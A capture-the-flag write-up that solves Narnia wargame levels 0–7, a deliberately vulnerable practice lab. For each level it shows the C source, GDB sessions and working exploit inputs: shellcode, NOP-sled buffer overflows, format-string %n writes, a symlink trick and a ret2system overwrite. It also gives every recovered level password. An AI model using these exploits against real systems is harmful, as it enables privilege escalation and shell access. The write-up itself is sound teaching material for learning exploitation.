[OTW] Write-up for the Narnia Wargame


The Narnia wargame is an online game offered by the OverTheWire community. This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game. You’ll get the source code of each level to make it easier for you to spot the vuln and abuse it.

The challenges can be found in the /narnia/ folder and the passwords for each level can be found in /etc/narnia_pass/narniaX.

Narnia 00 Solution

SSH : ssh narnia0@narnia.labs.overthewire.org -p 2226
Pass : narnia0

First, let’s try to execute the program…

narnia0@narnia:~$ cd /narnia/
narnia0@narnia:/narnia$ ./narnia0 
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: TEST
buf: TEST
val: 0x41414141
WAY OFF!!!!

Source Code

Now, let’s take a look at the source code.

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

To solve this challenge, we need to change the val value initialized with 0x41414141 to 0xdeadbeef.

Here, the issue come from the scanf() function. It allows the user to enter 24 chars however, the buf variable is only 20 bytes so, we can overwrite 4 bytes.

Let’s try to write 24 bytes as input and check if the address changes.

narnia0@narnia:/narnia$ python -c 'print 20 * "A" + "BBBB"' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAABBBB
val: 0x42424242
WAY OFF!!!!

It seems that we were able to modify the original value of val with 0x42424242. We will do the same thing with the right value or 0xdeadbeef

narnia0@narnia:/narnia$ (python -c 'print 20*"A" + "\xef\xbe\xad\xde"'; cat;) | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ�
val: 0xdeadbeef
whoami
narnia1
cat /etc/narnia_pass/narnia1
efeidiedae

Easy, right ?

Narnia 01 Solution

SSH : ssh narnia1@narnia.labs.overthewire.org -p 2226
Pass : efeidiedae

First, let’s try to execute the program…

narnia1@narnia:~$ cd /narnia/
narnia1@narnia:/narnia$ ./narnia1 
Give me something to execute at the env-variable EGG

Hum… It seems that we need to initialize an environment variable named EGG.

Source Code

Let’s clarify that with the source code.

#include <stdio.h>

int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}

Here, the code will execute anything we put in the EGG environment variable, we only need to find a shellcode and set the EGG variable. I used a random shellcode from the Exploit Database.

; https://www.exploit-db.com/exploits/44594
section .text
global _start

_start:
    xor ecx, ecx
    mul ecx
    push ecx
    mov edi, 0x978CD0D0
    mov esi, 0x91969DD0
    not edi
    not esi
    push edi
    push esi
    mov ebx, esp
    mov al, 0xb
    int 0x80

Here is the shellcode :

\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80

Now, let’s export it as an environment variable an re-execute the program.

narnia1@narnia:/narnia$ export EGG=`python -c 'print "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80"'`
narnia1@narnia:/narnia$ ./narnia1
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2
nairiepecu

Done !

Narnia 02 Solution

SSH : ssh narnia2@narnia.labs.overthewire.org -p 2226
Pass : nairiepecu

First, let’s try to execute the program…

narnia2@narnia:~$ cd /narnia/
narnia2@narnia:/narnia$ ./narnia2
Usage: ./narnia2 argument
narnia2@narnia:/narnia$ ./narnia2 ABCD
ABCDnarnia2@narnia:/narnia$

So, this program just return the string we enter to the standard output.

Source Code

Let’s check the source :

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
    char buf[128];

    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);

    return 0;
}

It looks like a standard buffer overflow challenge. There is no size check in the strcpy() function and the buf variable is only 128 bytes long. So, if we enter more chars than the size of the buffer, we should be able to break the execution flow by overwriting the return address.

Let’s do a quick check…

narnia2@narnia:/narnia$ ./narnia2 $(python -c 'print 140 * "A"')
Segmentation fault

Segfault ! Now, we’ll run the program in GDB to analyse this issue.

$ gdb narnia2

(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
   0x0804844b <+0>:	push   ebp
   0x0804844c <+1>:	mov    ebp,esp
   0x0804844e <+3>:	add    esp,0xffffff80
   0x08048451 <+6>:	cmp    DWORD PTR [ebp+0x8],0x1
   0x08048455 <+10>:	jne    0x8048471 <main+38>
   0x08048457 <+12>:	mov    eax,DWORD PTR [ebp+0xc]
   0x0804845a <+15>:	mov    eax,DWORD PTR [eax]
   0x0804845c <+17>:	push   eax
   0x0804845d <+18>:	push   0x8048520
   0x08048462 <+23>:	call   0x8048300 <printf@plt>
   0x08048467 <+28>:	add    esp,0x8
   0x0804846a <+31>:	push   0x1
   0x0804846c <+33>:	call   0x8048320 <exit@plt>
   0x08048471 <+38>:	mov    eax,DWORD PTR [ebp+0xc]
   0x08048474 <+41>:	add    eax,0x4
   0x08048477 <+44>:	mov    eax,DWORD PTR [eax]
   0x08048479 <+46>:	push   eax
   0x0804847a <+47>:	lea    eax,[ebp-0x80]
   0x0804847d <+50>:	push   eax
   0x0804847e <+51>:	call   0x8048310 <strcpy@plt>
   0x08048483 <+56>:	add    esp,0x8
   0x08048486 <+59>:	lea    eax,[ebp-0x80]
   0x08048489 <+62>:	push   eax
   0x0804848a <+63>:	push   0x8048534
   0x0804848f <+68>:	call   0x8048300 <printf@plt>
   0x08048494 <+73>:	add    esp,0x8
   0x08048497 <+76>:	mov    eax,0x0
   0x0804849c <+81>:	leave
   0x0804849d <+82>:	ret
End of assembler dump.
(gdb) run $(python -c 'print 140 * "A"')
Starting program: /narnia/narnia2 $(python -c 'print 140 * "A"')

Breakpoint 1, 0x0804848f in main ()
(gdb) conti
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Now, we adjust our string size to precisely overwrite the return address.

(gdb) run $(python -c 'print 132 * "A" + "BBBB"')
Starting program: /narnia/narnia2 $(python -c 'print 132 * "A" + "BBBB"')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

As you can see, we need 132 bytes of garbage and 4 more bytes to overwrite the retrun address. Now, we need a shellcode and a return address that will read our shellcode. I choose another shellcode from ExploitDB :

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

To find the return address I placed a breakpoint right after the strcpy() call :

(gdb) set disassembly-flavor intel
(gdb) break *main+68
Breakpoint 1 at 0x804848f
(gdb) run $(python -c 'print 104 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "BBBB"')
Starting program: /narnia/narnia2 $(python -c 'print 104 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "BBBB"')

Breakpoint 1, 0x0804848f in main ()
(gdb) x/100x $esp+500
0xffffd784:	0x000036b2	0x0000000e	0x000036b2	0x00000017
0xffffd794:	0x00000001	0x00000019	0xffffd7cb	0x0000001a
0xffffd7a4:	0x00000000	0x0000001f	0xffffdfe8	0x0000000f
0xffffd7b4:	0xffffd7db	0x00000000	0x00000000	0x00000000
0xffffd7c4:	0x00000000	0xa9000000	0x55fe0723	0x4a68d3c6
0xffffd7d4:	0xcc5d0b96	0x698947e8	0x00363836	0x00000000
0xffffd7e4:	0x00000000	0x00000000	0x616e2f00	0x61696e72
0xffffd7f4:	0x72616e2f	0x3261696e	0x90909000	0x90909090
0xffffd804:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd814:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd824:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd834:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd844:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd854:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd864:	0x50c03190	0x732f2f68	0x622f6868	0xe3896e69
0xffffd874:	0xc289c189	0x80cd0bb0	0xcd40c031	0x42424280
0xffffd884:	0x434c0042	0x4c4c415f	0x5f6e653d	0x552e5355
0xffffd894:	0x382d4654	0x5f534c00	0x4f4c4f43	0x723d5352
0xffffd8a4:	0x3a303d73	0x303d6964	0x34333b31	0x3d6e6c3a
0xffffd8b4:	0x333b3130	0x686d3a36	0x3a30303d	0x343d6970
0xffffd8c4:	0x33333b30	0x3d6f733a	0x333b3130	0x6f643a35
0xffffd8d4:	0x3b31303d	0x623a3533	0x30343d64	0x3b33333b
0xffffd8e4:	0x633a3130	0x30343d64	0x3b33333b	0x6f3a3130
0xffffd8f4:	0x30343d72	0x3b31333b	0x6d3a3130	0x30303d69
0xffffd904:	0x3d75733a	0x343b3733	0x67733a31	0x3b30333d

Here, I choose 0xffffd824 as it is in the middle of the NOP-sled. Let’s try again with the return address :

(gdb) run $(python -c 'print 104 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x24\xd8\xff\xff"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia2 $(python -c 'print 104 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x24\xd8\xff\xff"')

Breakpoint 1, 0x0804848f in main ()
(gdb) continue
Continuing.
process 21195 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
$

We got a shell, but we need to run it outside GDB’s context.

narnia2@narnia:/narnia$ ./narnia2 $(python -c 'print 104 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x24\xd8\xff\xff"')
$ whoami
narnia3
$ cat /etc/narnia_pass/narnia3
vaequeezee

Yay, we did it !

Narnia 03 Solution

SSH : ssh narnia3@narnia.labs.overthewire.org -p 2226
Pass : vaequeezee

First, let’s try to execute the program…

$ ssh narnia3@narnia.labs.overthewire.org -p 2226

narnia3@narnia:~$ cd /narnia/
narnia3@narnia:/narnia$ ./narnia3
usage, ./narnia3 file, will send contents of file 2 /dev/null

So, I guess we need to enter a file as argument…

Source Code

Here is the source :

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

    int  ifd,  ofd;
    char ofile[16] = "/dev/null";
    char ifile[32];
    char buf[32];

    if(argc != 2){
        printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
        exit(-1);
    }

    /* open files */
    strcpy(ifile, argv[1]);
    if((ofd = open(ofile,O_RDWR)) < 0 ){
        printf("error opening %s\n", ofile);
        exit(-1);
    }
    if((ifd = open(ifile, O_RDONLY)) < 0 ){
        printf("error opening %s\n", ifile);
        exit(-1);
    }

    /* copy from file1 to file2 */
    read(ifd, buf, sizeof(buf)-1);
    write(ofd,buf, sizeof(buf)-1);
    printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

    /* close 'em */
    close(ifd);
    close(ofd);

    exit(1);
}

So, the source looks complex but it’s not. In fact there is no boundary check on the input file. So, if we overflow ifile, we could overwrite the ofile which is statically intialized with /dev/null.

Let’s check the value of ofile with GDB, to do that we need to place a breakpoint here :

   0x0804855f <+84>:	add    esp,0x8
   0x08048562 <+87>:	push   0x2
   0x08048564 <+89>:	lea    eax,[ebp-0x18]
   0x08048567 <+92>:	push   eax
   0x08048568 <+93>:	call   0x80483c0 <open@plt> ; Right Here

As ofile pointer will be place in EAX we can see its value :

$ gdb narnia3

(gdb) break *main+93
Breakpoint 1 at 0x8048568
(gdb) run test
Starting program: /narnia/narnia3 test

Breakpoint 1, 0x08048568 in main ()
(gdb) x/s $eax
0xffffd690:	"/dev/null"

Okay, now we restart the program with 32 bytes of garbage and add a new path…

(gdb) run /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/whatever
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia3 /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/whatever

Breakpoint 1, 0x08048568 in main ()
(gdb) x/s $eax
0xffffd660:	"/whatever"

Awesome ! Now, we can write where we want. As /tmp/ is read/write/exec we can create something like /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp and create a symbolic link of /etc/narnia_pass/narnia4 to /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp/ax file so the program can write the password into our file.

Here are the steps :

narnia3@narnia:/narnia$ mkdir -p /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp
narnia3@narnia:/narnia$ ln -s /etc/narnia_pass/narnia4 /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp/ax
narnia3@narnia:/narnia$ touch /tmp/ax
narnia3@narnia:/narnia$ chmod 777 /tmp/ax
narnia3@narnia:/narnia$ ./narnia3 /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp/ax
copied contents of /tmp/FOOBARFOOBARFOOBARFOOBARFOO/tmp/ax to a safer place... (/tmp/ax)
narnia3@narnia:/narnia$ cat /tmp/ax
thaenohtai

It was a fun one :)

Narnia 04 Solution

SSH : ssh narnia4@narnia.labs.overthewire.org -p 2226
Pass : thaenohtai

First, let’s try to execute the program…

$ ssh narnia4@narnia.labs.overthewire.org -p 2226

narnia4@narnia:~$ cd /narnia/
narnia4@narnia:/narnia$ ./narnia4

Nothing… weird.

Source Code

Let’s check the source.

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
    int i;
    char buffer[256];

    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    if(argc>1)
        strcpy(buffer,argv[1]);

    return 0;
}

This one is similar to the level 2 however, we don’t have any output or result from the program. Here, the buffer variable is 256 bytes long and again, no boundary check. Let’s find where we overflow the return address…

$ gdb narnia4

(gdb) set disassembly-flavor intel
(gdb) run $(python -c 'print 264 * "A" + 4 * "B"')
Starting program: /narnia/narnia4 $(python -c 'print 264 * "A" + 4 * "B"')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So, 256 bytes of garbage and 4 more bytes to overwrite the return address. To exploit this one I used the following shellcode :

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

Let’s find a return address. Here, I placed a return address right after the strcpy() call :

(gdb) break *main+121
Breakpoint 1 at 0x8048524

(gdb) run $(python -c 'print 236 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + 4 * "B"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia4 $(python -c 'print 236 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + 4 * "B"')

Breakpoint 1, 0x08048524 in main ()
(gdb) x/100x $esp+600
0xffffd6e4:	0x00000000	0x00000009	0x080483b0	0x0000000b
0xffffd6f4:	0x000036b4	0x0000000c	0x000036b4	0x0000000d
0xffffd704:	0x000036b4	0x0000000e	0x000036b4	0x00000017
0xffffd714:	0x00000001	0x00000019	0xffffd74b	0x0000001a
0xffffd724:	0x00000000	0x0000001f	0xffffdfe8	0x0000000f
0xffffd734:	0xffffd75b	0x00000000	0x00000000	0x00000000
0xffffd744:	0x00000000	0xb9000000	0x47bfa236	0xde88977b
0xffffd754:	0x969dbe24	0x69e65cf5	0x00363836	0x00000000
0xffffd764:	0x00000000	0x616e2f00	0x61696e72	0x72616e2f
0xffffd774:	0x3461696e	0x90909000	0x90909090	0x90909090
0xffffd784:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd794:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7a4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7b4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7c4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7d4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7e4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd7f4:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd804:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd814:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd824:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd834:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd844:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd854:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd864:	0x50c03190	0x732f2f68	0x622f6868	0xe3896e69

We’ll use 0xffffd7b4 as it is in the middle of the NOP sled.

(gdb) run $(python -c 'print 236 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\xb4\xd7\xff\xff"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia4 $(python -c 'print 236 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\xb4\xd7\xff\xff"')

Breakpoint 1, 0x08048524 in main ()
(gdb) conti
Continuing.
process 22763 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
$

Looks like it worked. Let’s do the same outside GDB.

narnia4@narnia:/narnia$ ./narnia4 $(python -c 'print 236 * "\x90" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\xb4\xd7\xff\xff"')
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy

Success !

Narnia 05 Solution

SSH : ssh narnia5@narnia.labs.overthewire.org -p 2226
Pass : faimahchiy

First, let’s try to execute the program…

$ ssh narnia5@narnia.labs.overthewire.org -p 2226

narnia5@narnia:~$ cd /narnia/
narnia5@narnia:/narnia$ ./narnia5
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [] (0)
i = 1 (0xffffd6d0)

So, we need to modify the i variable with the value 500. We also know the address of i which is equal to 0xffffd6d0.

Source Code

Here is the source code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
	int i = 1;
	char buffer[64];

	snprintf(buffer, sizeof buffer, argv[1]);
	buffer[sizeof (buffer) - 1] = 0;
	printf("Change i's value from 1 -> 500. ");

	if(i==500){
		printf("GOOD\n");
        setreuid(geteuid(),geteuid());
		system("/bin/sh");
	}

	printf("No way...let me give you a hint!\n");
	printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
	printf ("i = %d (%p)\n", i, &i);
	return 0;
}

The issue here is the snprintf() function, as you can see there are no format specifiers. It means that we have a potential format string vulnerability here. Let’s try to enter some format specifiers in our input :

./narnia5 %x.%x.%x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [f7fc5000.30303035.3330332e] (26)
i = 1 (0xffffd6d0)

Ok, it’s definitly a format string vulnerability. With this kind of issue, we can write where we want in memory as long as we know where. Luckily, the program gives us the address of i.

Now, to write something on the stack we’ll use the %n specifier. Basically, %n write the size of our input at the address pointed by %n. For example, the following input : AAAA%n, means that we will write the value 4 (because the size of “AAAA” equals 4 bytes) at the address pointed by %n. But, where on the stack %n points to ?

Well, let’s say we want to write 4 at AAAA (0x41414141), we need to find the position of AAAA on the stack. To do that we’ll just enter the address followed by some %x specifiers :

narnia5@narnia:/narnia$ ./narnia5 AAAA%08x.%08x.%08x.%08x.%08x.%08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [AAAA41414141.31343134.31343134.3331332e.33313334.31332e34] (57)
i = 1 (0xffffd6b0)

In this case, the address is in the first position on the stack so, the exploit would look like this :

narnia5@narnia:/narnia$ ./narnia5 $(python -c 'print "AAAA" + "%1$n"')
Segmentation fault

Obviously, it segfault as we try to write the value 4 at a random address. Note the %1$n, the 1 specify the position of our address on the stack. If it was on the 3rd postion we would have used %3$n.

However we don’t want to write 4, we want to write 500. To do that we will use %<size>$x, it will serve as padding. Instead of writting our address followed by 496 chars, we’ll use %496$x.

Let’s try :

narnia5@narnia:/narnia$ ./narnia5 $(python -c 'print "\xc0\xd6\xff\xff" + "%496x%1$n"')
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng

Format strings are more complex than standard buffer overflow. If you are interested, you can read my post about this kind of vulnerability.

Narnia 06 Solution

SSH : ssh narnia6@narnia.labs.overthewire.org -p 2226
Pass : neezocaeng

First, let’s try to execute the program…

$ ssh narnia6@narnia.labs.overthewire.org -p 2226

narnia6@narnia:~$ cd /narnia/
narnia6@narnia:/narnia$ ./narnia6
./narnia6 b1 b2
narnia6@narnia:/narnia$ ./narnia6 123 456
123

It seems that the program takes 2 arguments and print the first one. Let’s check the source code to understand how it works.

Source Code

Here is the source :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

unsigned long get_sp(void) {
       __asm__("movl %esp,%eax\n\t"
               "and $0xff000000, %eax"
               );
}

int main(int argc, char *argv[]){
	char b1[8], b2[8];
	int  (*fp)(char *)=(int(*)(char *))&puts, i;

	if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

	/* clear environ */
	for(i=0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));

	/* clear argz    */
	for(i=3; argv[i] != NULL; i++)
		memset(argv[i], '\0', strlen(argv[i]));

	strcpy(b1,argv[1]);
	strcpy(b2,argv[2]);
	
	if(((unsigned long)fp & 0xff000000) == get_sp())
		exit(-1);

	setreuid(geteuid(),geteuid());
    fp(b1);

	exit(1);
}

If we skim-through the code, our arguments are respectively copied into b1 and b2. Also the fp variable is pointing to the puts() function, that’s why fp(b1) prints our first arguments.

If we run GDB and place a breakpoint at fp(b1) and analyse the stack, we should be able to see where are our variables in memory.

$ gdb narnia6

(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x080485a8 <+0>:	push   ebp
   0x080485a9 <+1>:	mov    ebp,esp
   0x080485ab <+3>:	push   ebx
   0x080485ac <+4>:	sub    esp,0x18
   0x080485af <+7>:	mov    DWORD PTR [ebp-0xc],0x8048430
 
...[removed]...

   0x080486d1 <+297>:	call   0x8048410 <geteuid@plt>
   0x080486d6 <+302>:	push   ebx
   0x080486d7 <+303>:	push   eax
   0x080486d8 <+304>:	call   0x8048450 <setreuid@plt>
   0x080486dd <+309>:	add    esp,0x8
   0x080486e0 <+312>:	lea    eax,[ebp-0x14]
   0x080486e3 <+315>:	push   eax
   0x080486e4 <+316>:	mov    eax,DWORD PTR [ebp-0xc]
   0x080486e7 <+319>:	call   eax ; Break here
   0x080486e9 <+321>:	add    esp,0x4
   0x080486ec <+324>:	push   0x1
   0x080486ee <+326>:	call   0x8048440 <exit@plt>
End of assembler dump.
(gdb) break *main+319
Breakpoint 1 at 0x80486e7
(gdb) run AAAA BBBB
Starting program: /narnia/narnia6 AAAA BBBB

Breakpoint 1, 0x080486e7 in main ()
(gdb) x/16wx $esp
0xffffd678:	0xffffd684	0x42424242	0xf7fc5300	0x41414141
0xffffd688:	0x08048700	0x08048430	0x00000003	0x00000000
0xffffd698:	0x00000000	0xf7e2a286	0x00000003	0xffffd734
0xffffd6a8:	0xffffd744	0x00000000	0x00000000	0x00000000
(gdb)
(gdb) x/x $eax
0x8048430 <puts@plt>:	0x99c825ff

Here, we can see our arguments AAAA (0x41414141) and BBBB (0x42424242). Also, we can see the pointer to the puts() function contained in EAX (0x8048430). The address of puts() is higher on the stack so, we should be able to overwrite it. Let’s try…

(gdb) run AAAAAAAACCCC BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia6 AAAAAAAACCCC BBBB

Breakpoint 1, 0x080486e7 in main ()
(gdb) x/16wx $esp
0xffffd678:	0xffffd684	0x42424242	0xf7fc5300	0x41414141
0xffffd688:	0x41414141	0x43434343	0x00000000	0x00000000
0xffffd698:	0x00000000	0xf7e2a286	0x00000003	0xffffd734
0xffffd6a8:	0xffffd744	0x00000000	0x00000000	0x00000000
(gdb) x/x $eax
0x43434343:	Cannot access memory at address 0x43434343

Looks very good ! Now, the idea would be to overwrite the return address with the address of system() and call a shell.

(gdb) p system
$2 = {<text variable, no debug info>} 0xf7e4c850 <system>
(gdb) run $(python -c 'print "sh;" + 5 * "A" + "\x50\xc8\xe4\xf7" + " BBBB"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia6 $(python -c 'print "sh;" + 5 * "A" + "\x50\xc8\xe4\xf7" + " BBBB"')

Breakpoint 1, 0x080486e7 in main ()
(gdb) x/16wx $esp
0xffffd678:	0xffffd684	0x42424242	0xf7fc5300	0x413b6873
0xffffd688:	0x41414141	0xf7e4c850	0x00000000	0x00000000
0xffffd698:	0x00000000	0xf7e2a286	0x00000003	0xffffd734
0xffffd6a8:	0xffffd744	0x00000000	0x00000000	0x00000000
(gdb) continue
Continuing.
$

We got a shell ! Now, let’s do the same outside GDB.

narnia6@narnia:/narnia$ ./narnia6 $(python -c 'print "sh;" + 5 * "A" + "\x50\xc8\xe4\xf7" + " BBBB"')
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
ahkiaziphu

Done !

Narnia 07 Solution

SSH : ssh narnia7@narnia.labs.overthewire.org -p 2226
Pass : ahkiaziphu

First, let’s try to execute the program…

$ ssh narnia7@narnia.labs.overthewire.org -p 2226

cd /narnia/
narnia7@narnia:/narnia$ ./narnia7
Usage: ./narnia7 <buffer>
narnia7@narnia:/narnia$ ./narnia7 test
goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd648)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

Looks like we need to redirect the execution flow somehow…

Source Code

Let’s check the source.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
	    fflush(stdout);
        setreuid(geteuid(),geteuid());
        system("/bin/sh");

        return 0;
}

When we execute the program, we land ont the goodfunction() but the program want us to execute the hackedfunction(). If we take a close look, we can see there is a format string vulnerability in the snprintf() function.

$ ./narnia7 ABCD
goodfunction() = 0x80486ff
hackedfunction() = 0x8048724

before : ptrf() = 0x80486ff (0xffffd638)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

So, according to the program, we need to modify prtf with the address of hackedfunction() (0x8048724). To do that we need to write 0x8048724 at 0xffffd638 (prtf()). Since we don’t really know where our input is placed on the stack, we’ll just brutforce the position. Note that the value we’ll write will be 134514464 (134514468 (or 0x8048724) - 4 = 134514464)

narnia7@narnia:/narnia$ ./narnia7 $(python -c 'print "\x38\xd6\xff\xff" + "%134514464d%1$n"')
